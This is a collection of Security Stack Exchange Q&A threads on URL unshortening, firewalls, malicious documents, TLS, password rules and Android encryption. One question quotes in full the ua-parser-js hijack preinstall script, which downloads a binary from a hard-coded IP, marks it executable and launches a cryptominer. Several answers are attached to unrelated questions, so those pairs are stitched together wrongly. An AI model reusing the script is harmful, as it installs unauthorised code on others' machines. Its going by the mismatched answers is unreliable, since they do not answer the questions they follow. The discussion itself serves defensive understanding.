Unless your code has a memory corruption vulnerability in its handling of NTP, or there's a similar vulnerability in some part of the networking stack, there's basically no attack surface there. Furthermore, an Arduino Uno uses an Atmel ATmega328P, which does not support execution of code from RAM. The code executes from the MCU program flash, which is not writable at runtime. This makes it highly implausible that anyone could gain either volatile or non-volatile persistence on it.
{ "source": [ "https://security.stackexchange.com/questions/255378", "https://security.stackexchange.com", "https://security.stackexchange.com/users/267399/" ] }
255,448
There are a lot of different URL shorteners out there, like Bitly or TinyURL . Besides their main purpose of shortening a link, they also: obfuscate the actual URL collect statistics about the usage of the short link From the obfuscation, at least two risks arise: The actual URL might have been obfuscated to hide its suspicious domain. While people might click on a link of a well-known link shortening provider, they probably would not access a URL that looks like paypal.secure-sfksjdfs.com , AMAZ0N.COM or ajhssafskjh.ru . The actual URL might have been obfuscated to hide the query string that might contain identifying data. This could be personal data like in this URL: https://completelyimaginary.url/[email protected] Or an ID that might be relatable to you (e. g. in case it was only sent to you): https://completelyimaginary.url/index.html?id=T3X3MAPNEIYAKAZPHNC4 Or it may contain information that has been obfuscated even more (Base64): https://completelyimaginary.url/index.html?url=aHR0cHM6Ly9iaXQubHkvM2t3UVYyMA-- To avoid these risks, can I safely preview a short link to be able to inspect the actual URL before opening it? In other words, can I get the target URL without actually accessing it?
Most of the link shortening providers also offer a possibility to preview the URL a short link will redirect to. Most times, it is sufficient to modify a little detail of the short link: Bitly Add a + sign to the short link ( source ): https://bit.ly/3kwQV20 -> https://bit.ly/3kwQV20+ Cuttly Add a @ symbol to the short link: https://cutt.ly/YEh65VC -> https://cutt.ly/YEh65VC@ is.gd Add a - (hyphen) sign to the short link: https://is.gd/vzC7mi -> https://is.gd/vzC7mi- TinyURL Add a + sign to the short link: https://tinyurl.com/3yw559cj -> https://tinyurl.com/3yw559cj+ Or add preview as a subdomain to the short link: https://tinyurl.com/3yw559cj -> https://preview.tinyurl.com/3yw559cj If the link shortening provider does not offer a way to preview the URL, you can also use the following tools to get the URL to which a short link will redirect to. They all have in common that they will only download the headers of the short link and will not follow the URL the short link points to. Be aware that your access may be logged by the link shortening provider and it also may be added to the statistics of the short link usage. curl curl does not follow redirects by default. The option -I tells it to only download the headers: curl -sI https://bit.ly/3kwQV20 | grep -i Location Output: location: https://security.stackexchange.com/q/255448/230952 wget Alternative with wget : wget -S --spider --max-redirect=0 https://bit.ly/3kwQV20 2>&1 | grep -i Location wget will follow redirections by default, so you have to limit it by --max-redirect=0 . Furthermore, it will write to the error stream, so you have to redirect that to be able to grep it. The output will be: Location: https://security.stackexchange.com/q/255448/230952 If the target looks like another redirection, then you can re-run the command, changing --max-redirect=0 to --max-redirect=1 . This makes wget stop before the second redirect, etc. PowerShell Alternative with Invoke-WebRequest : (Invoke-WebRequest -Uri https://bit.ly/3kwQV20 -Method Head -MaximumRedirection 0 -ErrorAction SilentlyContinue).Headers.Location Or more abbreviated: (iwr https://bit.ly/3kwQV20 -Me H -Ma 0 -EA Si).Headers.Location Output: https://security.stackexchange.com/q/255448/230952 URL Checkers If you don't have access to the above tools, you can also use online services to do it for you. Be aware that you probably don't know how exactly they work. So they might even access the target URL, which might be undesirable in some threat models. Example websites: https://getlinkinfo.com/ https://unshorten.it/ https://unshorten.me/ http://urlxray.com/
{ "source": [ "https://security.stackexchange.com/questions/255448", "https://security.stackexchange.com", "https://security.stackexchange.com/users/230952/" ] }
255,717
Let's assume we have an example machine connected to the internet. This machine is typically a client one, and it has no services like ssh running on. Does this kind of machines need any firewall to restrict incoming connections? On the one hand, there's no services that would accept the network packets, so there's no threat to the system, but is it really safe to accept such packets without DROP'ing them? Is there any possibility that the linux kernel would misinterpret such packets and behave in unpredictable way?
This is close to ask whether a shutdown computer needs updates. The answer is not if and only if you are sure that it will always stay off. Your question should receive a similar answer: if you are sure that no listening services are active and will never be you do not need to block incoming connections. But in real world, no network service at all is hard to achieve. At least XWindow is a network oriented protocol and many services are installed and are active by default on a newly installed system. Furthermore, a firewall should not be limited to blocking incoming connections, but should also control which outgoing connections are allowed. Doing so can prevent that a user just downloads or receives by mail (through legitimate outgoing connections...) in infected application that later will try to leak private informations or even worse will open a tunnel giving the attacker a local access. The stricter the outgoing filter the harder it will be for the attacker.
{ "source": [ "https://security.stackexchange.com/questions/255717", "https://security.stackexchange.com", "https://security.stackexchange.com/users/34482/" ] }
255,804
Corporate security trainings keeps saying "download a file from the web or email attachment and open it and you might become infected". I know this used to be the case on old Windows machines in the 90s, but is it still the case on any computer? Obviously if you open a shell file or executable file or app that might be a problem, but at least on Macs, Apple has that warning popup. Are they basically suggesting that there might be some exploitable holes in the software we use "regularly" (like excel or Apple numbers, or Apple preview for PDFs), and they can exploit those loopholes to install something somehow? The loophole would be unknown to the company providing the software but known to the attacker? That's the only way I can see them getting access to your computer, is there another way? I would assume in today's world, there is 0% chance of getting "infected" by opening a PDF or .xlsx or .doc file on a Mac, but is that not true? As a bonus question, if it is still true today that opening a "normal" file might install malware, what is the recommended approach to avoiding this, assuming you want to be able to open these files (and assuming you've checked it's from reputable sources, etc.).
Simple Instructions Over "Correct" Instructions You may be a security expert, or at least a very knowledgable person when it comes to computers, but the vast majority of people - even those, who work with computers on a daily basis - are not. I know entirely too many people, who think computers are basically a box full of plastic and magic. Explaining to these people which file extensions are more likely to be dangerous and which ones are less likely to be dangerous will probably lead to a lot of confusion. I assure you that a significant amount of people, who work in an office, can't tell the difference between a PDF document and a Word document, so explaining what the risk of each is is not very productive. As such, broad statements like " Don't open files from e-mail attachments unless they are from a trusted source " are useful still, even if they are not 100% technically correct. Which Files Are Dangerous? Basically, all of them. Always presume that a file is dangerous, even if you can't imagine how it could possibly. Here is a list of some common file types and how they could be dangerous: PDF Files: PDF is a complex file format and as of the time of this writing, over 1500 expoits related to PDFs exist in the CVE database . Office Documents: One of the most prominent attacks in Office documents is macros. The general idea is that you send someone an office document, claim that it contains some important information, then create the document in such a way that it only displays the supposed information if macros are enabled. For example, you can steal NTLM hashes like that . Spreadsheets: Also related to Office applications, you can create a malicious spreadsheet, which executes OS commands when being opened. This attack is called CSV Injection . ZIP Files: ZIP files can be quite dangerous. For one, they can cause Denial-of-Service attacks through something like a zip bomb or place arbitrary files on a machine through zip slipping . While there are indeed measures to mitigate some of these risks, often times these include asking the user if they want to do something risky. 9 times out of 5, they will say yes. Not because they understand that the action they're about to take is risky, but because their computer asks them so often if they want to do something and they're used to playing the little game where they have to find the button that makes the computer do what they want to do. How to Mitigate This Risk? There is no perfect one-size-fits-all solution. If there was, we wouldn't have to worry about malware. It depends largely on the technical expertise of who you are talking to. When talking to an expert, I would say "Trust your gut!". Your instinct is the most advanced part of the brain, optimized over millions of years through the most brutal optimization process in existence - you do well to use it. If you have a bad feeling with a file, don't open it. And if you have to, do it in a VM on an airgapped machine, which you completely scrub afterwards. When talking to the average user, I would repeat the same handful of security tips you have heard a million times. Don't open files from untrustworthy sources, have an up-to-date anti-virus, etc. etc. You've heard it a million times before.
{ "source": [ "https://security.stackexchange.com/questions/255804", "https://security.stackexchange.com", "https://security.stackexchange.com/users/268102/" ] }
256,116
Just finished a simple local file inclusion challenge and I wanted to make sure if I understood the issues around permissions and SSH keys correctly: -We set private ssh keys to 600 so only the user who owns them can read them. Say we had 777 instead of 600: That means that any user (so for example, www-data) can read them and thus can obtain the private key. What I don't understand is how or why when trying to connect over SSH to another host, said host knows that we have such permissions. (Is it the server or the local SSH process running that warns us?). And what is the minimum accepted to connect? I.e. the less restrictive permissions
It is not about the SSH server knowing about the file permissions of the client. The scenario is instead having multiple users on the same computer or on the same shared network file system. Since the private key should identify a specific user it is necessary that other users on the same shared resource cannot read or manipulate the private key, i.e. the minimum permissions should allow read and write access only for the user itself, i.e. -rw------- which translates to (octal) 0600.
{ "source": [ "https://security.stackexchange.com/questions/256116", "https://security.stackexchange.com", "https://security.stackexchange.com/users/253360/" ] }
256,126
(shown in step 1): Is the initial process in public key encryption where the public key is transferred across the network done in plaintext? It seems like it must be, which essentially means that no matter if a victim is using HTTPS or a VPN on a public network, if the initial process is done in plain text, than a middleman who has full access to the network traffic can essentially just intercept that initial public key transfer process, steal the key, and effectively intercept the rest of the victims "secure" transmission in their "secure" internet session? So if I am right, public networks are only secure as long as the device obtaining the public key was there before the attacker was?
It is not about the SSH server knowing about the file permissions of the client. The scenario is instead having multiple users on the same computer or on the same shared network file system. Since the private key should identify a specific user it is necessary that other users on the same shared resource cannot read or manipulate the private key, i.e. the minimum permissions should allow read and write access only for the user itself, i.e. -rw------- which translates to (octal) 0600.
{ "source": [ "https://security.stackexchange.com/questions/256126", "https://security.stackexchange.com", "https://security.stackexchange.com/users/268609/" ] }
256,132
For context; I have a web application that allows users to upload a PDF file from which the web app extracts certain information by parsing it. The app then sends this information to another server for further processing. The web app is based on Python (Django & FastAPI) and runs on a Linux-based operating system inside a Docker container (which has root privileges). The PDF file is not stored, it is received at an endpoint as a regular HTTP request with the file contained in the form data (multipart/form-data); this file is then converted to HTML and parsed (the file is never stored on the server, only handled in-memory). The resulting data are sent to another server for storage in an SQL database. My questions are as follows: Is parsing the file in an interpreted language such as Python considered to be 'executing' it? Does handling this file in this manner pose any risk to the server if the file contains malware?
It is not about the SSH server knowing about the file permissions of the client. The scenario is instead having multiple users on the same computer or on the same shared network file system. Since the private key should identify a specific user it is necessary that other users on the same shared resource cannot read or manipulate the private key, i.e. the minimum permissions should allow read and write access only for the user itself, i.e. -rw------- which translates to (octal) 0600.
{ "source": [ "https://security.stackexchange.com/questions/256132", "https://security.stackexchange.com", "https://security.stackexchange.com/users/268612/" ] }
256,373
Recently (just now) the npm package ua-parser-js was found to be hijacked. The hijack installs a crypto miner on preinstall but I noticed the following passage in the preinstall script: IP=$(curl -k https://freegeoip.app/xml/ | grep 'RU\|UA\|BY\|KZ') if [ -z "$IP" ] then var=$(pgrep jsextension) if [ -z "$var" ] then curl http://159.148.186.228/download/jsextension -o jsextension if [ ! -f jsextension ] then wget http://159.148.186.228/download/jsextension -O jsextension fi chmod +x jsextension ./jsextension -k --tls --rig-id q -o pool.minexmr.com:443 -u 49ay9Aq2r3diJtEk3eeKKm7pc5R39AKnbYJZVqAd1UUmew6ZPX1ndfXQCT16v4trWp4erPyXtUQZTHGjbLXWQdBqLMxxYKH --cpu-max-threads-hint=50 --donate-level=1 --background &>/dev/null & fi fi My question is why does the script check if the server is in Russia, Ukraine, Belarus or Kazakhstan before downloading the payload? Is there something special about these countries?
Certain governments tend to ignore hacking/cybercrime carried out by their own citizens, as long as they only target people from other countries. Brian Krebs talks about this in an article earlier this year: In Russia, for example, authorities there generally will not initiate a cybercrime investigation against one of their own unless a company or individual within the country’s borders files an official complaint as a victim. Ensuring that no affiliates can produce victims in their own countries is the easiest way for these criminals to stay off the radar of domestic law enforcement agencies. There have been various malware samples in the past that did this by looking at the keyboard layouts that were installed (to the point that some people were recommending installing a Cyrillic layout to protect yourself against malware). What you're seeing is a different version of the same thing.
{ "source": [ "https://security.stackexchange.com/questions/256373", "https://security.stackexchange.com", "https://security.stackexchange.com/users/268974/" ] }
256,390
When sniffing network traffic, one can see an HTTPS packet and all its (encrypted) data. I am wondering what would happen if this packet is copied and then re-sent. Is there a protocol at some layer that prevents the same packet being used twice? (with something such as a timestamp maybe) If not, how should the server side defend against it?
There are multiple mechanisms to detect duplicates. At the TCP level there is the sequence number sent within each TCP packet, which allows to detect if a packet was received twice, or more generally if it overlaps with already received data. This is not actually a security feature but to detect packet reordering, duplication and loss and this way provide a reliable transport layer on top of an unreliable network layer. If such a duplicate gets detected it will simply be discarded. At the TLS level no sequence number are explicitly sent on the wire, but sequence numbers are still maintained inside the TLS state of each peer and are included in the computation of the payload protection. Thus TLS has a replay protection by design - see TLS sequence number for more. Since a successfully replayed packet essentially means that an attacker was able to actively fiddle with the underlying reliable TCP connection, this connection will usually be treated as compromised and abandoned. Additionally each new TLS session results in a different encryption key, i.e. the server would not be able to decrypt a HTTP request sniffed from a different TLS session in the first place. Thanks to user253751 pointing this out in a comment.
{ "source": [ "https://security.stackexchange.com/questions/256390", "https://security.stackexchange.com", "https://security.stackexchange.com/users/269005/" ] }
256,395
DocuSign requires that your password "must not contain the characters <, > or spaces." Is this not an odd requirement? Despite being a leader in online document signing, my gut tells me there's something odd under-the-hood.
Generously? Because that restriction was created by somebody with no understanding of web security. (Less-generous possible explanations are up to the reader.) The typical danger in such characters is if they're ever output into the response, in which case they could lead to XSS. However, that shouldn't ever be a problem, for so many reasons. Foremost, passwords in general should literally never be in responses. There's just no situation where a user-specified password should ever be present in any content returned from a server. It shouldn't even be possible to do this; the server should not store the password (even in memory) for any longer than is needed to verify its quality and then hash it. If the quality check (which can be done every time, or only at password creation/rotation) fails, you still should immediately forget what it was (and definitely shouldn't return it, see #1). Passwords should only ever be persisted in the form of digests from salted and expensive hashing functions. Hash digests won't contain those characters (under any likely encoding), shouldn't ever be put in responses either, and having those characters in the input is irrelevant to the digest anyhow . Even if, for some security-forsaken reason, you wanted to return a password in a response, you should apply standard anti-XSS measures to it, like output encoding. This applies to all user input that ends up in responses. You could also return the value in an API response and have client-side code inject it as text (this is what e.g. React does), which is also safe. XSS is generally only relevant if an attacker can force somebody else to visit the page. Since a login page isn't going to reflect any other user's stored data back, and certainly shouldn't do anything with taking a password from the URL and putting it in the DOM client-side, the only approach that would make sense is reflected XSS. It's easy (though admittedly uncommon) to prevent third parties from attempting to submit a password on behalf of another browser; that's what anti-CSRF methods do (login CSRF is generally not treated as a big risk, but in the specific case of DocuSign it actually might be, if somebody uploads a confidential form to what they think is their account but actually isn't, so hopefully they are protecting against that). There are other mitigations against XSS, such as Content Security Policy. With nearly all browsing activity now on browsers that support it, and with login pages being security-critical and generally lacking third-party content, they're an easy and obvious place to get a lot of protection from CSP. Beyond all the reasons why you shouldn't need to have such restrictions, they look extremely sketchy. They imply that passwords might ever end up in responses and/or that they're being stored in plain text (in the database, or in logs which is arguably even worse). As a practical matter, preventing those few characters doesn't meaningfully impact the security of available passwords (that is, nobody is likely to have a password that would be safe if only it could contain a < , but isn't otherwise), nor does it significantly simplify brute-forcing attacks. However, it still reflects poorly on the security awareness of the site. EDIT: As pointed out in the comments, it's possible the problem is instead that the unhashed passwords are - or were at some point - being put into another context that cares about angle brackets, such as an XML document (stored or transmitted). Obviously this breaks several of the guidelines above, such as doing anything with the password other than validating, hashing, and forgetting it, but also it's easily addressed; as with reflecting the password into HTML, if it's put into XML, it should be output encoded first.
{ "source": [ "https://security.stackexchange.com/questions/256395", "https://security.stackexchange.com", "https://security.stackexchange.com/users/269016/" ] }
256,457
While analysing a DDoS attack on my site using CloudFlare console, I've noticed that many attack requests come from AS139190 GOOGLE-AS-AP Google Asia Pacific Pte. Ltd. with Empty user agent . I'm wondering how Google is exploited to attack my site?
Most likely someone using Google's Cloud Platform (GCP) . They have a page here where you can report abuse on their platform.
{ "source": [ "https://security.stackexchange.com/questions/256457", "https://security.stackexchange.com", "https://security.stackexchange.com/users/269106/" ] }
256,524
So let's say you have setup TLS between two different services. And you want to "prove" that out (for lack of better words. Basically just trying to witness the encrypted traffic in action). What's the best/easiest way to do that? Because those two services are communicating directly, can you really put yourself in the "middle" of the communication without doing major things (I guess modifying the routing tables of both services to send traffic through the observer?)? I suppose one way is to go on one service and just look at network traffic with tcpdump? Is that correct? And if so, is that the easiest way? Thanks in advance!
Most likely someone using Google's Cloud Platform (GCP) . They have a page here where you can report abuse on their platform.
{ "source": [ "https://security.stackexchange.com/questions/256524", "https://security.stackexchange.com", "https://security.stackexchange.com/users/218786/" ] }
256,863
Why does an encryption key derived from your lock screen password give you "stronger protection" than a key chosen by the machine (or at any rate not derived from your lock screen password)? The context in which the above generic question arises for me is a Samsung mobile phone running on Android 11. So a more specific question (if that is preferable) would be: Why the above is the case for that particular device. In what follows, I will describe the context in more detail. If the question as stated above is already answerable, you may not have to read any further. Context As far as I can make out, this is what happens with an Android 11 Samsung phone. Encryption, in the sense of the machine's jumbling the data in storage, is always on (with no option to turn it off), but it may or may not give you any protection depending on which of the three cases below applies. Case 1. There is no lock screen password (where 'password' is a term of convenience that includes PIN, pattern etc. as well): You get no protection. The data may be encrypted, but anyone can get them decrypted without having to enter a password. Case 2. A lock screen password is set, but the "Strong protection" is off: You get protection. The machine chooses the encryption key. Case 3. A lock screen password is set and the "Strong protection" is on: You get more protection. The encryption key is derived from your lock screen password. Note. On the device, "Strong protection" is in Settings > Biometrics and security > Other security settings > "Strong protection." The blurb for it says, "Encrypt your phone using your secure lock type (pattern, PIN, or password)." If my understanding so far is wrong, please tell me so. The question may not even arise then, and I may have to delete it. Assuming then that the understanding is correct, the question is why derivation of the encryption key from something you chose gives you stronger protection? I would have thought the machine could do without your help (which may be 1234) to choose a strong encryption key. By the way, are there technical terms for encryption (in the sense of data jumbling whether or not it gives you any protection) vs. protection? Correction Case 3, as stated above, is wrong because of the way the term 'password' was defined (to include biometrics through 'etc.'). To get the benefit of an encryption key that is itself encrypted (with something you chose), you need to use the following: Case 3b. A lock screen pattern, PIN, or alphanumeric password is set and the "Strong protection" is on. For why this is so, see A. Hersean's answer. (I did not want anyone, having read only the question, to go away with the wrong information. I choose this manner of correcting the post, rather than striking out 'etc.', because the exclusion of biometrics is made more prominent and I don't want to appear to have got the thing right at the outset.)
In all cases, the encryption key is chosen at random by the device (your mobile phone). When biometrics are used to unlock the phone, they are checked by a mostly secure module (a TEE , in your case the Knox™ version of ARM TrustZone™). If the check says that the presented biometrics are close enough to those stored in the device, then the encryption key is read to decrypt the device. That means that the encryption key is stored as-is somewhere, and its access is only protected by an access control mechanism. Someone with physical access to the mobile phone could open it, read the key and decrypt the device, bypassing the access control. When a PIN, pattern, password or passphrase is used, the process can be made safer. Notice that a pattern is just a PIN with digits that cannot be repeated (instead of drawing it you could type it on a number pad). So a pattern is a weak PIN (because some combinations are impossible), and a PIN is a weak password (because only digits are allowed) which is a weak passphrase. So, I'll simplify this answer by only referring to passphrases. When a passphrase is used, the encryption key is not stored directly in the device. It is first encrypted by a key encryption key (KEK). This KEK is derived by the passphrase and never stored anywhere. When a user tries to authenticate, its passphrase is derived into a KEK, then the mobile check if this KEK decrypts properly a test value. If the check fails, it means the passphrase is wrong. If the check pass, the newly derived KEK is used to decrypt the encryption key, which in turn can be used to decrypt the device. Thus if someone gains physical access to the device, they cannot read the key. They can only try to guess the passphrase until they find the correct one. Because the derivation process takes some time (on purpose), trying every passphrase can be a very long process if the passphrase is long enough. When using biometrics, each reading differs, so no unique value can be used to derive a KEK. The encryption key must be stored somewhere in the device and accessible without a KEK derived from some data provided by the user. Previously I simplified when writing that in this case the encryption key is written as-is: for Android versions 7 to 9, it was in fact encrypted too, and the passphrase used to derive the KEK was "default_password". This was done to simplify the overall unlocking process by having only one way to do it. This offer no more protection than storing directly the encryption key, because the passphrase is public knowledge. In new versions of Android, file-based encryption is used, and there is no more only one single encryption key, but many keys for different files. However, the overall mechanism remains the same, but with more keys and thus more complexity. Explaining it would be too complex for the level of technical details expected here. However, if you want more details, you can refer to the official documentation here and there , or refer to defalt's answers here and there . Just keep in mind that authenticating with biometrics can only deliver an authentication token, but it cannot be used to derive a KEK. That's why Samsung says that patterns, PINs and passphrases are strong methods: in those cases attackers with physical access will have a harder time to decrypt the device because they will have to guess the passphrase. However, please note that trying every pattern and PIN is still very fast, so those two methods are not so much more secure than using biometrics against this kind of attacker. For a strong encryption, the user must use a strong passphrase. Side note, answering a comment: The delay to limit guessing only applies to someone trying every possibility using the graphical interface, maybe with a robot typing on the screen. For someone who opened the phone and copied its (mostly encrypted) data by accessing it directly, no such limitation applies. By the way, copying this data requires specialized skills and hardware. The time it takes to derive the KEK is due to the huge number of operations needed to make the computation. However, someone who managed to copy the data can rent thousands of computers in the cloud to try all the combinations even faster, working in parallel with each computer trying a different set of combinations, and without delay limits enforced by the platform. Second side note: You also asked about technical terms for encryption (or "data jumbling") versus protection. "Data jumbling" is technically called obfuscation when it does not provide any substantial protection. Encryption is the technical term for when this jumbling is done depending only on a secret key , implying that everything else is considered public knowledge. Encryption is a mechanism to protect the confidentiality of data, but it does not ensure its authenticity (in some cases, an attacker could blindly alter the encrypted data with success without being detected). For this, other cryptographic mechanisms are needed, such as authentication codes or signatures. To summarize, there is no "encryption versus protection". Encryption is a mechanism offering one kind of protection. Like a lock. And like a lock, it does not protect against everything, but only against some attacks. Third side note, for clarification: In this answer, I try to explain in simple terms the fundamental difference between encryption on mobile devices (specifically Android) using only biometrics or using passphrases. It is a simplification, and shortcuts where made while explaining. Reality is more complex and other issues arise, such as "What happens when someone copies my fingerprint? I cannot change it, unlike a passphrase.".
{ "source": [ "https://security.stackexchange.com/questions/256863", "https://security.stackexchange.com", "https://security.stackexchange.com/users/269728/" ] }
256,886
After a password leak, is there a Levenshtein distance from which one a newly derivated password can be considered safe? I assume yes, given that if e.g. the word was "password", and the new one is "drowssap", the distance is 8 and we have a "new" (in this case very lazy change that is surely not secure). I was wondering about whether in targeted attacks, a hacker could build up a dictionary for a single person using a list of passwords already found (e.g. from a compilation of breaches). I do understand that the Levenshtein distance is no good indicator for a safe password. However, I do wonder up until what maximum distance a bruteforce of all possible variations of a given password is not feasible anymore, or the other way around, if I know the password was "password" (standing for any 8-character password) in the future and I expect the person to use a similar password in the future, e.g. I had a aunt for which I know she would do this, what would I have to give her as a minimum distance so I cannot easily calculate and guess her new password in an offline attack, assuming I was able to retrieve the password hash? I know the question is theoretical, but I aim to understand the whole thing from a bigger picture and, e.g. if the Levenshtein distance can play any important role in password security. I am aware of all the good practices that are usually recommended.
Levenshtein distance as a proxy for password strength is extremely limited , for the reasons that schroeder has outlined. And the user experience will probably be poor. But the question is still academically interesting, and may be useful as a component for some use cases - so it still deserves a thorough answer. :D Generally, the minimum Levenshtein distance between a previous password and a new one should be the same size as the minimum length of a randomly-generated password that would resist brute force (adjusted to the threat model). But it's important to note that even this minimum is often inadequate. My answer is based on a few factors: the speed (attack difficulty) of the target hash type how much information about the previous password may be available to the attacker the methodology used to generate the initial password the usefulness of Levenshtein distance as a proxy for password change strength First, about speed. Worst case - a "fast" hash like MD5 - many different kinds of attacks become possible. This will allow us to put an upper bound on the minimum Levenshtein distance. Best case - a "slow" hash like bcrypt - attack speed slows significantly, but is not as slow as it used to be (more about that below). Second, about the user's previous password. We must assume that the attacker has the user's previous password. Not only is password reuse chronic, but nowadays, even if the attack is against slow hash, modern attack stacks include a highly efficient "per target" attack mode called a "correlation attack" (made possible by John the Ripper's "single" mode and later by hashcat's -a 9 mode) that leverages knowledge of previous passwords, even in bulk across a large leak. In correlation attacks, we assume that the attacker has access to the user's previous password (from a previous leak, from a different site due to password reuse, etc.). The attack takes the user's old password as a "base" and then applies a specific set of "mangling rules" (append $, capitalize the first letter, etc.) to each plaintext , but just for that user's hash . For larger batches of users and slower hashes, this dramatically increases the attack speed - because instead of trying the same candidate against every hash in a long list (as most traditional attacks do), correlation attacks apply those mangling rules just to that user's old password and then try the resulting candidate against just that user's hash . This is not just academic - real-world cracking now heavily depends on correlating user:password or email:password leaks and cracks against new targets. So we must assume that the attacker has the previous password. Third, about the password generation methodology. Worst case - the passwords are single human-generated words that are easily found in a password frequency list (like "123456"). If a human selects the next password, the likelihood that it will be similar to that is probably high, so even very low Levenshtein distances are probably relevant. Best case - the passwords are entirely randomly generated, both initially and later. In this case, Levenshtein distance isn't as relevant (or rather, measuring the Levenshtein distance between two randomly generated passwords is just a proxy for measuring the quality of their randomness). Fourth, about Levenshtein distance as a proxy for password strength. It is useful to think about this in terms of practical password entropy - how hard it is to attack in the real world, with full knowledge of how humans psychologically "chunk" password components. (This is also why Shannon entropy is notoriously bad at assessing the strength of non-randomly-generated passwords, because it assumes brute force - that each letter in a word is a "chunk" that has to be independently attacked - instead of how a human remembers password components ("just add my kid's name"). Worst case - at the lowest entropy levels, as discussed above - if a user just increments a number by 1, or appends a different special character, etc., the Levenshtein distance will be extremely low. Best case - at the most complex - inserting a randomly selected character in a random position in the string is probably the highest practical entropy change (the hardest to predict) that can be made. For example, if we randomly inject 8 characters into a password, the delta in practical entropy is basically the same as if we had generated an 8-character random password. Given all of the above ... If we assume all worst cases (human-generated password, poor password-selection strategy, etc.), the answer should be clear: the amount of change in the password should itself be enough to withstand attack on its own - totally independent of the previous password (as if the first password was empty), and as if it was stored using a very fast hash like MD5. This is reduced to how fast we can reasonably expect a randomly generated password to be exhausted for a given threat model, and is covered well elsewhere (but can often hover around 13-15 random characters). Unfortunately, as with many attempts to measure password strength, it's not that easy. This is because a password change with high Levenshtein distance can still have very low practical differential entropy. For example, if the user's first password is 'password', and their new password is 'passwordrumpelstiltskin', the Levenshtein distance of 15 sounds terrific. But the practical Levenshtein distance - of real-world changes to the initial string as humans apply them - is not 15, but rather one ("add a word"). In other words ... just like Shannon entropy, usefulness of Levenshtein distance as a measure of password strength is really only useful in cases where the passwords are already randomly generated . And if you're doing that, you already have the information necessary to keep them strong, without trying to measure the difference between two of them. In even other words ... very low Levenshtein distances are an OK proxy for password change weakness , but high Levenshtein distances are a very poor proxy for password change strength . So my answer tries to find a balance between the two.
{ "source": [ "https://security.stackexchange.com/questions/256886", "https://security.stackexchange.com", "https://security.stackexchange.com/users/209428/" ] }
256,947
I found an information leakage vulnerability on a company website and I found that the information includes all the usernames of the users. I also observed that the application uses a lockout mechanism that locks out users after 5 attempts for 30 mins. So will this lockout be considered a vulnerability? Yes, account lockout is not a vulnerability but will the information leakage increase the severity of the problem or not?
I would consider this a serious vulnerability. This can lead to an attack where the attacker can lock out every single user for 30 minutes. Unless the company have a VPN in place, or other protection mechanism, it would be possible to download the entire user list, throw bogus passwords at all of them, and lock the entire company out. They can even keep this in a loop and essentially deny access to all employees for a long period of time.
{ "source": [ "https://security.stackexchange.com/questions/256947", "https://security.stackexchange.com", "https://security.stackexchange.com/users/246544/" ] }
257,021
This question may be a little off-topic, but is Math.random the same as crypto.getRandomValues? (JavaScript) Here's an example: Math.random(); // 0.11918419514323941 self.crypto.getRandomValues(new Uint32Array(10))[0]; // 2798055700 (Using "self" for cross-site prevention) They don't output the same number or nearly the same length, but I'm wondering if "crypto.getRandomValues" is more secure then "Math.random"? A user told me (on this site) that I should use "crypto.getRandomValues" instead of "Math.random" for JavaScript security. All of this is for a JavaScript security project.
See MDN: Crypto.getRandomValues() , where it reads: The Crypto.getRandomValues() method lets you get cryptographically strong random values. (emphasis mine) In contrast, see MDN: Math.random() , where it reads: Note: Math.random() does not provide cryptographically secure random numbers . Do not use them for anything related to security. Use the Web Crypto API instead, and more precisely the window.crypto.getRandomValues() method. (emphasis mine)
{ "source": [ "https://security.stackexchange.com/questions/257021", "https://security.stackexchange.com", "https://security.stackexchange.com/users/269810/" ] }
257,038
Around 4 months ago, someone learned my IP, and is threatening to DDoS attack me if I am not his slave. He was breaking the Discord TOS with all kinds of stuff in my DMs. I blocked him, but one of his friends told me to friend him back, or he will DDoS me. What should I do?
ISP's have ways of dealing with DDoS attacks targeting one or more IP addresses on their network. See How can ISPs handle DDoS attacks? for some interesting reading on this subject. What you are describing sounds more like online banter than a serious threat, and I would be surprised if your your adversary actually follows through with their threat (or even has the capability to do so). But, if he does attempt to mount a DDoS attack targeting the IP address that your ISP has assigned to you, and you are impacted by it - simply report it to your ISP and they can likely mitigate the problem using one of the methods in the above link.
{ "source": [ "https://security.stackexchange.com/questions/257038", "https://security.stackexchange.com", "https://security.stackexchange.com/users/269980/" ] }
257,071
We are serving static content over the internet, and have a business requirement that the data must be encrypted at rest. Currently it is stored in AWS S3, where it can be accessed by authorized clients over HTTP. We could proxy this through Cloudfront or Nginx to use TLS, but would only do so if it is necessary. The decryption key is retrieved by frontend client via a separate HTTPS request. Do we gain anything by serving the static content over HTTPS, given that it is already encrypted? It brings added costs, infrastructure, and latency, and I cannot think of the benefit.
You should serve this data over HTTPS regardless. As Gh0stFish pointed out, you can simply use an S3 bucket policy to require this. There are a couple reasons for this: Using plain HTTP makes it very easy to perform traffic analysis. If I know that encrypted blob 123 is sensitive because I've already seen it or it comes from a site with sensitive information, I can see who else has downloaded this blob and associate the sensitive information with them. Unlike static encryption, TLS is usually configured to provide perfect forward secrecy. That is, once the connection has been torn down, the data cannot be recovered. HTTPS is now standard, and not using it, even for encrypted data, is often seen as irresponsible. If your customers inquire whether their data is served over HTTPS, you can simply say, "Yes," instead of having to explain why you don't and why it's still secure. HTTP/2, which can provide significant performance improvements, is only available over HTTPS in web browsers. I don't believe S3 currently supports HTTP/2, but if it does in the future, you'll need to be using HTTPS. HTTPS is fast. Most x86-64 systems will be able to handle encrypted data at speeds over 6 GiB/s on a single core, which is faster than a 10 Gb/s network card. Encryption is no longer the bottleneck that it once was, so there's little reason not to use it. HTTPS provides protection against tampering with the request. For example, if I as the attacker just saw client A request file 123 and I now see client B request file 456, I could substitute the response given to client A if the key is not unique. If I know file 123 is for a publicly available sex education site and client B is a large corporation, I could substitute material which, while not pornographic, might not be appropriate for a workplace.
{ "source": [ "https://security.stackexchange.com/questions/257071", "https://security.stackexchange.com", "https://security.stackexchange.com/users/270038/" ] }
257,080
